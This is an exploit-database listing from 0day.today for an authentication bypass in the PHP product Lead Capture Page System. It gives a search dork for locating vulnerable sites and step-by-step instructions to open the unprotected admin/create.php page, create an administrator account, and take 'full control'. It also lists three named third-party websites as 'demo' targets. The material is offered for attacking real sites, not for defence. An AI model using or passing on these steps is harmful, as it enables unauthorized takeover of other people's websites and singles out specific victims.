[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Lead Capture Page System Authentication Bypass Vulnerability

Author
ITTIHACK
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17367
Category
web applications
Date add
12-01-2012
Platform
php
(Lead Capture Page System) Authentication Bypass Vulnerability

       Software : Lead Capture Page System                                                                    
       Date     : 1/12/2012                                           	
       Vendor   : http://leadcapturepagesystem.com               
	   Get App. : http://leadcapturepagesystem.com/order.php?id=1       
       Price    : $235	                                                 
       Dork     : intext:"Powered By Lead Capture Page System"	                                   
       Author   : ITTIHACK                                                      
       Home     : http://ittihack.com                                                            
	   
                                                                                
Description:
By this exploit, you can bypass admin's login page, follow these steps to learn more:

      1) Use the dork above to find yours.
      2) Go to http://site/admin
      Now you will be redirected to login page: http://site/admin/login.php, you are required to login, just change the link above by this:
      3) replace login.php with create.php -->  http://site/admin/create.php
      4) Fill up the blanks, and Click on: Create Account
      5) Now change the URL to: http://site/admin/account.php
      6) That's all, full control XD


                                                                                              
Demo Sites:       http://goldengatetowealth.org/admin   --->  http://goldengatetowealth.org/admin/create.php
                  http://instantmoneynetwork.com/admin  --->  http://instantmoneynetwork.com/admin/create.php
                  http://silver2up.com/admin            --->  http://silver2up.com/admin/create.php 



#  0day.today [2024-12-24]  #